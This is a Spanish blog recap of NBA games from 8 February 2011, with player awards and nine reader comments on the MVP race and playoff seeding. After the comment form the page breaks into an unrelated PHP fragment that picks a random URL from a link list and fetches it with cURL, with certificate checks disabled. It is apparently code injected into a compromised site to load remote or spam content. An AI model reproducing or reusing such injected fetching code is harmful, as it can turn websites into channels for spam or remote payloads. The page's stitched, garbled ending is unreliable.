La Crónica (08/02/2011)

09 de February de 2011 por TheDeerHunter

Jornada desangelada, empezando por las victorias razonablemente cómodas de los Spurs en Detroit (100-89) y de los Magic ante los Clippers en partidos un tanto sosos (85-101). El aburrimiento también fue la nota predominante en el palizón que les inflingieron los Bucks a los Raptors en una actuación terrible de Calderón (74-92). Los ciervos vuelven a poder juntar con un quinteto apañado y se nota. Buena actuación de Salmons en su regreso a la titularidad.

Los Heat por suparte sudaron la gota gorda para doblegar a los nuevos Pacers (112-117). Necesitaron de la mejor versión del Elegido y de una importante aportación de Chalmers para romper la gran racha del técnico Vogel. En cambio, los Hawks volvieron a hacer el ridículo en casa, en esta ocasión contra los Sixers (117-83). El equipo de Doug Collins está mostrando una imagen colectiva notable y su rendimiento va claramente en ascenso. Recordemos que ya están a la caza de los Knicks, que tan bien han llegado a jugar en algunos tramos de este curso.

Los Grizzlies dieron la campanada en Oklahoma (105-101). Prórroga y decisiva victoria foránea basada en el abuso de Zach y Tony Allen sobre sus respectivos pares. Durant y Westbrook estuvieron demasiado solos. El resultado es doblemente bueno porque los Rockets tropezaron contra los Wolves (112-108). 38º doble doble consecutivo de Love.

PREMIOS

MVP: Los Heat necesitaban que apareciera Lebron James y él apareció a lo grande. 41 puntos (15 de 23) aderezados con 13 rebotes, 8 asistencias y 3 robos. 50 puntos de eficiencia. Casi nada.

Rookie: Completísima actuación de Evan Turner saliendo desde el banquillo y consiguiendo 8 puntos, 8 rebotes y 7 asistencias. Aquí hay talento pero cuesta que salga.

Sorpresa: Explosión de Tony Allen frente los Thunder. El ex de Boston estuvo pletórico a ambos lados de la cancha con 27 puntos en una gran serie de tiro (9 de 12) y 5 robos de balón.

Decepción: Espeluznante actuación de 3 de los titulares de los Raptors. Entre Calderon, Weems y Amir Johnson sólo fueron capaces de anotar 5 de sus 32 lanzamientos a canasta. La palma para Calderón que falló 13.

Esfuerzo en vano: Como ya hemos comentado en el resumen, la pareja Durant-Westbrook estuvo muy sola ante los Grizzlies. Juntos anotaron 52 puntos, completementados con 15 rebotes y 13 asistencias. Baron Davis también vio como su magnífica actuación (25-8-8 y 3 robos) servía de bien poco ante los Magic.

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. Denise dice:
    #1

    Bueno, el partido de los Magic fue mas o menos igualado hasta el ultimo cuarto. Griffin no tuvo su sía, Foye es un paquete que intenta hacer de Gordon pero no le llega ni a los tobillos, y solo Davis y un sorprendente Diogu sobresalieron.
    Temporadon el de los Sixers, recordando a aquellos de la 07/08 que tantos problemas dieron, la unica mala noticia es que Turner no termina de despegar.
    Los Hawks haciendo el ridiculo, perdiendo 65-33 al descanso. Alguien me puede decir una pareja de bases mas mala que Bibby y Teague?
    Lebron James MVP sin duda de lo que llevamos de campeonato

      Citar

  2. Len Bias dice:
    #2

    A ver si me podéis resolver una duda que me ha entrado ahora.
    Los tres primeros de cada conferencia son los campeones de división no? Me explico, si Boston consigue 60 victorias, Miami 58, Orlando 52 y Chicago 50… Chicago sería 3º de conferencia por ser campeón de división y Orlando no, no?
    Sé que otros años era así, pero no sé si sigue siendo… Si es así, Chicago estará entre los 3 primeros seguro aunque tengan una crisis ahora. Y Oklahoma también creo que estará entre los 3 primeros del Oeste, no veo a a los rivales de división capaces de acabar con más victorias que los Thunder

      Citar

  3. TheDeerHunter dice:
    #3

    Yo creo que eso juega sólo a la hora de la clasificación para postemporada, pero no en el orden exácto. Los Thunder son los 4º de la conferencia y no tendrían ventaja campo contra los Lakers, por ejemplo.

    Por cierto, que para mí el MVP de la temporada es Rose hasta la fecha.

      Citar

  4. HisRoyalAirness dice:
    #4

    Para mí también es Rose, sin duda, y Stat tendría muchas papeletas

      Citar

  5. Len Bias dice:
    #5

    El orden exacto no, pero al fin y al cabo, para determinar los emparejamientos de playoffs (que es lo más importante) sí que contaría no?
    Es decir, Oklahoma acaba con menos victorias que Dallas pero al ser campeón de división se enfrentaría al 6º y Dallas al 5º?

    Por cierto, gran concurso de triples no? Allen, Pierce, Durant, Bubby Gibson, James Jones y Dorell Wright.
    Apuesto por Durant o James Jones

      Citar

  6. Moman dice:
    #6

    Os dejáis como rookie a Greg Monroe, que aunque juegue en Detroit lo está haciendo bastante bien

      Citar

  7. Vader dice:
    #7

    @Len Bias

    Pues yo por Allen!!!

      Citar

  8. Busky23 dice:
    #8

    Allen puede y debe ganar el concurso y celebrar a lo grande el ser el mejor bombardero de la historia de la liga.
    Terrible partido una vez más de Jeff Green,hay partidos en los que se necesita algo más que Durant-Westbrook y ahí es donde nunca hay nadie que de el paso adelante.
    Sobre el MVP,hasta el momento yo también apuesto por Rose aunque si el bueno de Lebron se lo propone…

      Citar

  9. TX dice:
    #9

    Hasta hace unos meses no daba un duro por los Heat, es más he sido anti LeBron como los que más. Pero viendo como juega cuando juega en equipo, los porcentajes de tiro y encima un Wade a gran nivel ya me está empezando a dar miedo este equipo. Si consiguieran tener un juego interior aunque sea como un equipo como Pacers les daría campeones directamente… Pero esque está SA y Celtics (hoy por hoy veo a Lakers inferiores a Oklahoma, y eso que todos los años pasa lo mismo)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>